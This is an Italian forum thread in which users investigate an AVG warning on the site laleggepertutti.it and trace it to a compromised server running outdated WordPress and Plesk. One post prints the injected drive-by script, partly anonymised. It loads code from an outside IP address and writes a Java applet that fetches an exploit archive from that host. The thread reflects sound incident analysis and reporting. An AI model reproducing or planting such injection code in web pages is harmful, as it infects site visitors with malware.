Pagina 1 di 1
JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 1:17 pm
da Blumare
Salve a tutti , eccoci di nuovo con le segnalazioni di AVG . Arrivo sul sito , AVG blocca la minaccia , questo il report delle maggiori informazioni :
This link on laleggepertutti.it is unsafe for browsing
http://www.laleggepertutti.it/
1 active threats have been detected on this link
JavaScript Obfuscation (type 156)
Navigation on this site is not recommended.
297 compromised pages have been found on laleggepertutti.
Il sito è molto buono , e questa è la pagina della reputazione di WOT : http://www.mywot.com/en/scorecard/www.l ... ertutti.it .
Potrebbe essere il “ solito “ java od uno script ? Oppure un’immagine o banner pubblicitario ? 
Re: R: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 1:58 pm
da hashcat
Qual'é il link bloccato sul sito?
Re: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 2:28 pm
da Blumare
Non sembra ci siano link bloccati , al momento il sito si visita benissimo , ma deve stare protetto da intrusioni . Arrivo solo su alcune pagine e scatta il blocco della minaccia . Per questo ho pensato a banner pubblicitari od immagini . Ho trovato anche questo , non so quanto attendibile : http://www.wpitaly.it/forum/topic.php?id=15026 .
Re: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 2:30 pm
da eDog
Blumare ha scritto:1 active threats have been detected on this link
JavaScript Obfuscation (type 156)
Forse viene usato dello strano codice per impedire la lettura del codice js presente in quelle pagine.. :penso
Re: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 2:39 pm
da Blumare
Allora basterebbe cambiarlo , credo . Mentre una migrazione di traffico sospetta potrebbe indicare qualcosa che si nasconde ?
Re: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 2:45 pm
da crazy.cat
Anche collegandosi con Firefox basta aspettare e compare questo messaggio
Re: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 3:04 pm
da Blumare
Anche io mi collego con Firefox ( 21.0 , l’ultimo aggiornamento ! ) e quel messaggio non compare . Però somiglia all'avviso di quando si visita un sito che richiede Java e non lo si ha .
Re: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 3:07 pm
da crazy.cat
Blumare ha scritto:Però somiglia all'avviso di quando si visita un sito che richiede Java e non lo si ha .
Io ho Java e non faccio eseguire applicazioni a nessun sito che me lo richiede.
Codice nascosto da qualche parte direi pure io.
Re: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 3:26 pm
da Blumare
Magari in qualche pubblicità od immagine . Nulla da segnalare collegandosi con altri browser come Opera , Safari , IE8 .
Re: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 4:13 pm
da crazy.cat
Con ie9 esce prima un errore di sintassi di java script e poi questo
Re: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 4:17 pm
da hashcat
Beccato:
Codice: Seleziona tutto
<script language="javascript">
var ws = new Date();
ws.setDate(14 + ws.getDate());
document.cookie = "stats=valore_cookie; path=/; expires=" + ws.toGMTString();
temp1 = "link_exploit_base64";
temp2 = "jnlp_";
</script>
<script src="http://212.124.116.10:8080/perscorso/blabla"></script>
<script>
var v = PluginDetect.getVersion('Java').split(',');
if (v[1] == 7) {
document.write('<applet height="10" width="10"><param name="' + temp2 + 'href" value="blablabla.jnlp" /><param name="' + temp2 + 'embedded" value="' + temp1 + '" /><param name="fuck_you" value="identificativo" /></applet>');
} else {
document.write('<object type="application/x-java-applet" name="xxxxxx" width="10" height="10"><param name="code" value="xxxxxx.blablabla.class" /><param name="archive" value="http://212.124.116.10:8080/percorso/2.zip" /><param name="abcevfalwqhvj" value="identificativo" /></object>');
}
</script>
Il sito utilizza una versione di Wordpress non aggiornata (3.4.2), il server é Apache gestito da Plesk (é stata segnalata UNA vulnerabilitá 0-day 2 giorni fa).
Tutto ció comporta una compromissione del server, che inietta, a seconda del browser utilizzato, nel fondo della pagina, il contenuto mostrato sopra (anonimizzato per ovvie ragioni). 
P.S.: Se desiderate, posto un link per il file jar dell'exploit.
Re: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 4:56 pm
da Blumare
Potrebbe essere utile , hashcat 
! Quindi , Wordpress da aggiornare , ma poi ? Non devono mica formattare e reinstallare tutto :doh , vero ? Mi pare eccessivo .
Re: R: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 5:03 pm
da hashcat
Il problema principale é PLESK (l'utilizzo di una versione obsoleta e vulnerabile del software), la responsabilitá della compromissione é dell'azienda che si occupa dell'hosting del sito.
Re: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 5:15 pm
da Blumare
Quindi è " solo " da aggiornare PLESK , ma non devono farlo loro ? Bene !
Re: R: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 5:30 pm
da hashcat
Credo di si, per appurarlo con certezza bisognerebbe verificare se l'iniezione di codice malevolo avviene anche per gli altri siti ospitati dal provider di servizi di hosting.
Re: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 5:47 pm
da Blumare
Ma questo non riguarda laleggepertutti.it ! Gli ho mandato il link a questa discussione , quindi
Ragazzi , Turbolab.it ha appena risolto il suo primo “ caso “ !
Re: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 6:29 pm
da Blumare
E nel frattempo Al3x aveva già segnalato due giorni fa lo stesso “ Zero-Day “ : http://turbolab.it/forum/viewtopic.php?f=23&t=231 . 
Re: R: JavaScript Obfuscation ( type 156 )
Inviato: sab giu 08, 2013 6:52 pm
da hashcat
L'avevo letto ma mi ero completamente dimenticato della sua esistenza.
Nel frattempo ho inviato il campione a VirusTotal ed ESET.
Re: R: JavaScript Obfuscation ( type 156 )
Inviato: dom giu 09, 2013 12:41 pm
da hashcat
Per completezza segnalo QUESTO post su Full Disclosure che descrive il processo di infezione causato dalla vulnerabilitá.